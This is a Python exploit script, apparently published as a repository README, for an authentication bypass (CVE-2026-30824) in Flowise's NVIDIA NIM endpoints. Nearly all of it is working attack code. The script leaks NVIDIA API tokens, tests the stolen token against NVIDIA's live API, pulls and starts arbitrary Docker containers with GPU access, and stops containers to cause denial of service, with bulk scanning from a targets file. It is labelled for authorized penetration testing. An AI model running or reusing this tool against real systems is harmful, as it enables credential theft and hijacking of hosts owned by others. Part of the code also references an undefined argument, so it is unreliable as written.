README.md
Rendering markdown...
#!/usr/bin/env python3
"""
CVE-2026-30824 — Flowise NVIDIA NIM Authentication Bypass
Exploit for authorized penetration testing only.
Affects: Flowise < 3.0.13
CVSS: 9.8 (Critical)
CWE-306: Missing Authentication for Critical Function
The /api/v1/nvidia-nim/* path is whitelisted in the global auth middleware,
allowing unauthenticated access to container management and token generation.
"""
import requests
import json
import argparse
import sys
import time
from urllib.parse import urljoin
# ANSI color codes
GREEN = '\033[92m'
RED = '\033[91m'
YELLOW = '\033[93m'
BLUE = '\033[94m'
RESET = '\033[0m'
BOLD = '\033[1m'
class FlowiseAuthBypass:
"""Exploit for CVE-2026-30824 — Flowise NVIDIA NIM Auth Bypass."""
def __init__(self, target: str, verify_ssl: bool = False, timeout: int = 15):
self.target = target.rstrip("/")
self.verify_ssl = verify_ssl
self.timeout = timeout
self.session = requests.Session()
self.session.verify = verify_ssl
def _request(self, method: str, path: str, data: dict = None, headers: dict = None):
"""Send an unauthenticated request to an NVIDIA NIM endpoint."""
url = urljoin(self.target, path)
req_headers = {"Content-Type": "application/json"}
if headers:
req_headers.update(headers)
try:
if method.upper() == "GET":
resp = self.session.get(url, headers=req_headers, timeout=self.timeout)
else:
resp = self.session.post(url, headers=req_headers, json=data, timeout=self.timeout)
# Debug: print endpoint info if response is HTML
if "<!doctype html" in resp.text.lower() or "<html" in resp.text.lower():
print(f"{YELLOW}[!] Warning: Got HTML response from {path}{RESET}")
print(f"{YELLOW} This endpoint may not be an API endpoint{RESET}")
return resp
except requests.exceptions.RequestException as e:
return {"error": str(e), "status": 0}
def check_vulnerable(self) -> bool:
"""
Determine if the target is vulnerable by probing /get-token.
A vulnerable instance will return an accessible endpoint (200, 400, 500 with response).
A patched instance will return 401 Unauthorized.
"""
resp = self._request("GET", "/api/v1/nvidia-nim/get-token")
if isinstance(resp, dict) and resp.get("error"):
print(f"{RED}[-] Connection error: {resp['error']}{RESET}")
return False
if resp.status_code == 401:
print(f"{YELLOW}[-] Target returns 401 — likely patched (>= 3.0.13){RESET}")
return False
if resp.status_code == 404:
print(f"{YELLOW}[-] Endpoint not found — target may not be Flowise{RESET}")
return False
# 5xx errors (502, 503, etc.) indicate server issues, not vulnerability
if resp.status_code >= 500:
print(f"{YELLOW}[-] Server error (HTTP {resp.status_code}) — target may be down or misconfigured{RESET}")
return False
# Vulnerable: responds with accessible endpoint (2xx, 3xx, or application-level errors like 400)
if resp.status_code < 500:
print(f"{GREEN}{BOLD}[+] Target appears VULNERABLE (HTTP {resp.status_code}){RESET}")
print(f" Response: {resp.text[:300]}")
return True
return False
def get_token(self):
"""
Leak the NVIDIA API token.
GET /api/v1/nvidia-nim/get-token
"""
print("[*] Attempting to leak NVIDIA API token...")
resp = self._request("GET", "/api/v1/nvidia-nim/get-token")
if isinstance(resp, dict) and resp.get("error"):
print(f"[-] Error: {resp['error']}")
return None
# Check if we got HTML instead of JSON (endpoint may be wrong)
if "<!doctype html" in resp.text.lower() or "<html" in resp.text.lower():
print(f"{RED}[-] Got HTML response instead of JSON. Endpoint may not be accessible or vulnerability is patched.{RESET}")
return None
if resp.status_code == 200:
try:
data = resp.json()
token = data.get("access_token")
print(f"{GREEN}[+] NVIDIA API Token: {token}{RESET}")
print(f"[+] Token Type: {data.get('token_type')}")
print(f"[+] Expires In: {data.get('expires_in')}s")
return token
except json.JSONDecodeError:
print(f"[+] Raw response: {resp.text[:500]}")
return resp.text
else:
print(f"[-] Failed. HTTP {resp.status_code}: {resp.text[:300]}")
return None
def list_running_containers(self):
"""List running NIM containers. GET /api/v1/nvidia-nim/list-running-containers"""
print("[*] Listing running containers...")
resp = self._request("GET", "/api/v1/nvidia-nim/list-running-containers")
if isinstance(resp, dict) and resp.get("error"):
print(f"[-] Error: {resp['error']}")
return None
# Check if we got HTML instead of JSON
if "<!doctype html" in resp.text.lower() or "<html" in resp.text.lower():
print(f"{RED}[-] Got HTML response instead of JSON{RESET}")
return None
print(f"[+] HTTP {resp.status_code}")
try:
data = resp.json()
print(json.dumps(data, indent=2))
return data
except json.JSONDecodeError:
print(resp.text[:500])
return resp.text
def get_container(self, container_id: str):
"""Get container details. POST /api/v1/nvidia-nim/get-container"""
print(f"[*] Getting container details: {container_id}")
resp = self._request("POST", "/api/v1/nvidia-nim/get-container",
{"containerId": container_id})
if isinstance(resp, dict) and resp.get("error"):
print(f"[-] Error: {resp['error']}")
return None
print(f"[+] HTTP {resp.status_code}")
try:
data = resp.json()
print(json.dumps(data, indent=2))
return data
except json.JSONDecodeError:
print(resp.text[:500])
return resp.text
def get_image(self, image_id: str):
"""Get image details. POST /api/v1/nvidia-nim/get-image"""
print(f"[*] Getting image details: {image_id}")
resp = self._request("POST", "/api/v1/nvidia-nim/get-image",
{"imageId": image_id})
if isinstance(resp, dict) and resp.get("error"):
print(f"[-] Error: {resp['error']}")
return None
print(f"[+] HTTP {resp.status_code}")
try:
data = resp.json()
print(json.dumps(data, indent=2))
return data
except json.JSONDecodeError:
print(resp.text[:500])
return resp.text
def pull_image(self, image_tag: str, api_key: str = "test"):
"""
Pull an arbitrary Docker image onto the host.
POST /api/v1/nvidia-nim/pull-image
This can be used to pull a malicious container image.
"""
print(f"[*] Pulling image: {image_tag}")
resp = self._request("POST", "/api/v1/nvidia-nim/pull-image",
{"imageTag": image_tag, "apiKey": api_key})
if isinstance(resp, dict) and resp.get("error"):
print(f"[-] Error: {resp['error']}")
return None
print(f"[+] HTTP {resp.status_code}")
try:
data = resp.json()
print(json.dumps(data, indent=2))
return data
except json.JSONDecodeError:
print(resp.text[:500])
return resp.text
def start_container(self, image_tag: str, container_name: str = None,
gpus: str = "all", env: dict = None):
"""
Start an arbitrary container.
POST /api/v1/nvidia-nim/start-container
This is the most dangerous endpoint — can launch arbitrary Docker containers
with GPU access on the host.
"""
payload = {"imageTag": image_tag}
if container_name:
payload["containerName"] = container_name
if gpus:
payload["gpus"] = gpus
if env:
payload["env"] = env
print(f"[*] Starting container from image: {image_tag}")
resp = self._request("POST", "/api/v1/nvidia-nim/start-container", payload)
if isinstance(resp, dict) and resp.get("error"):
print(f"[-] Error: {resp['error']}")
return None
print(f"[+] HTTP {resp.status_code}")
try:
data = resp.json()
print(json.dumps(data, indent=2))
return data
except json.JSONDecodeError:
print(resp.text[:500])
return resp.text
def stop_container(self, container_id: str):
"""
Stop a running container (DoS).
POST /api/v1/nvidia-nim/stop-container
"""
print(f"[*] Stopping container: {container_id}")
resp = self._request("POST", "/api/v1/nvidia-nim/stop-container",
{"containerId": container_id})
if isinstance(resp, dict) and resp.get("error"):
print(f"[-] Error: {resp['error']}")
return None
print(f"[+] HTTP {resp.status_code}")
try:
data = resp.json()
print(json.dumps(data, indent=2))
return data
except json.JSONDecodeError:
print(resp.text[:500])
return resp.text
def preload(self):
"""Trigger resource consumption. GET /api/v1/nvidia-nim/preload"""
print("[*] Triggering preload...")
resp = self._request("GET", "/api/v1/nvidia-nim/preload")
if isinstance(resp, dict) and resp.get("error"):
print(f"[-] Error: {resp['error']}")
return None
print(f"[+] HTTP {resp.status_code}")
print(resp.text[:500])
return resp.text
def validate_token_against_nvidia(self, token: str):
"""
Validate the leaked token against NVIDIA's actual API
to demonstrate the full blast radius.
"""
print("[*] Validating token against NVIDIA API...")
headers = {"Authorization": f"Bearer {token}"}
try:
resp = requests.get(
"https://integrate.api.nvidia.com/v1/models",
headers=headers, timeout=10
)
if resp.status_code == 200:
data = resp.json()
models = data.get("data", [])
print(f"[+] Token VALID! Access to {len(models)} NVIDIA NIM models.")
for m in models[:5]:
print(f" - {m.get('id')}")
return True
else:
print(f"[-] Token rejected by NVIDIA. HTTP {resp.status_code}")
return False
except requests.exceptions.RequestException as e:
print(f"[-] Could not reach NVIDIA API: {e}")
return False
def main():
parser = argparse.ArgumentParser(
description="CVE-2026-30824 — Flowise NVIDIA NIM Authentication Bypass Exploit",
epilog="Authorized security testing only."
)
parser.add_argument("-t", "--target",
help="Target URL (e.g., http://192.168.1.100:3000)")
parser.add_argument("-f", "--targets-file",
help="File with list of targets (one per line)")
parser.add_argument("--check", action="store_true",
help="Only check if target is vulnerable")
parser.add_argument("--scan-only", action="store_true",
help="Scan targets for vulnerability without prompts (useful for bulk scanning)")
parser.add_argument("--get-token", action="store_true",
help="Leak NVIDIA API token")
parser.add_argument("--validate-token", metavar="TOKEN",
help="Validate a leaked token against NVIDIA API")
parser.add_argument("--list-containers", action="store_true",
help="List running containers")
parser.add_argument("--get-container", metavar="CONTAINER_ID",
help="Get container details")
parser.add_argument("--get-image", metavar="IMAGE_ID",
help="Get image details")
parser.add_argument("--pull-image", metavar="IMAGE_TAG",
help="Pull a Docker image (e.g., nvcr.io/nvidia/nim:latest)")
parser.add_argument("--start-container", metavar="IMAGE_TAG",
help="Start a container from an image tag")
parser.add_argument("--container-name", default=None,
help="Name for the started container")
parser.add_argument("--stop-container", metavar="CONTAINER_ID",
help="Stop a running container")
parser.add_argument("--preload", action="store_true",
help="Trigger preload endpoint")
parser.add_argument("--all", action="store_true",
help="Run all reconnaissance checks")
parser.add_argument("--timeout", type=int, default=15,
help="Request timeout in seconds")
parser.add_argument("--debug", action="store_true",
help="Show request details and raw responses")
args = parser.parse_args()
if not args.target and not args.targets_file:
parser.print_help()
sys.exit(1)
targets = []
if args.target:
targets = [args.target]
elif args.targets_file:
try:
with open(args.targets_file, 'r') as f:
targets = [line.strip() for line in f if line.strip()]
except IOError as e:
print(f"[-] Error reading targets file: {e}")
sys.exit(1)
if not targets:
print("[-] No targets provided")
sys.exit(1)
print("=" * 60)
print(" CVE-2026-30824 — Flowise NVIDIA NIM Auth Bypass")
print(" Authorized Penetration Testing Tool")
print("=" * 60)
print(f"\n[*] Processing {len(targets)} target(s)\n")
vulnerable_targets = []
patched_targets = []
error_targets = []
for target_idx, target in enumerate(targets, 1):
if not (args.scan_only or args.check):
print(f"\n{'='*60}")
print(f"[*] Target {target_idx}/{len(targets)}: {target}")
if not (args.scan_only or args.check):
print(f"{'='*60}\n")
exploit = FlowiseAuthBypass(target, verify_ssl=False, timeout=args.timeout)
is_vulnerable = exploit.check_vulnerable()
if not is_vulnerable:
if args.scan_only or args.check:
patched_targets.append(target)
else:
# Try the check anyways — it may still work
if len(targets) == 1: # Only ask for confirmation if single target
response = input("\n[?] Continue anyway? (y/N): ").strip().lower()
if response != "y":
continue
else:
print("[-] Skipping this target")
continue
else:
vulnerable_targets.append(target)
# Exit early for scan-only or check modes
if args.scan_only or args.check:
continue
print()
# Single-action modes
if args.check:
print("[*] Check complete.")
continue
if args.validate_token:
exploit.validate_token_against_nvidia(args.validate_token)
continue
if args.get_token:
token = exploit.get_token()
if token and not args.no_ssl_verify:
if len(targets) == 1:
link = input("\n[?] Validate token against NVIDIA API? (y/N): ").strip().lower()
if link == "y":
exploit.validate_token_against_nvidia(token)
continue
if args.list_containers:
exploit.list_running_containers()
continue
if args.get_container:
exploit.get_container(args.get_container)
continue
if args.get_image:
exploit.get_image(args.get_image)
continue
if args.pull_image:
exploit.pull_image(args.pull_image)
continue
if args.start_container:
exploit.start_container(args.start_container, args.container_name)
continue
if args.stop_container:
exploit.stop_container(args.stop_container)
continue
if args.preload:
exploit.preload()
continue
# --all mode: run comprehensive recon
if args.all or not any([args.check, args.get_token, args.list_containers,
args.get_container, args.get_image, args.pull_image,
args.start_container, args.stop_container, args.preload]):
print("[*] Running full reconnaissance...\n")
# 1. Leak token
token = exploit.get_token()
print()
# 2. List containers
exploit.list_running_containers()
print()
# 3. Preload
exploit.preload()
print()
# If we got a token, validate it
if token:
print("[*] Token obtained. Attempting NVIDIA API validation...")
exploit.validate_token_against_nvidia(token)
print("\n[*] Full reconnaissance complete for this target.")
print(f"\n{'='*60}")
print(f"{BOLD}[*] Scan Summary{RESET}")
print(f"{'='*60}")
print(f"{GREEN}[+] VULNERABLE: {len(vulnerable_targets)}{RESET}")
if vulnerable_targets:
for target in vulnerable_targets:
print(f"{GREEN} ✓ {target}{RESET}")
print(f"{YELLOW}[-] PATCHED: {len(patched_targets)}{RESET}")
if patched_targets:
for target in patched_targets:
print(f"{YELLOW} ✗ {target}{RESET}")
print(f"{RED}[!] ERRORS: {len(error_targets)}{RESET}")
if error_targets:
for target in error_targets:
print(f" ⚠ {target}")
print(f"{'='*60}\n")
if __name__ == "__main__":
main()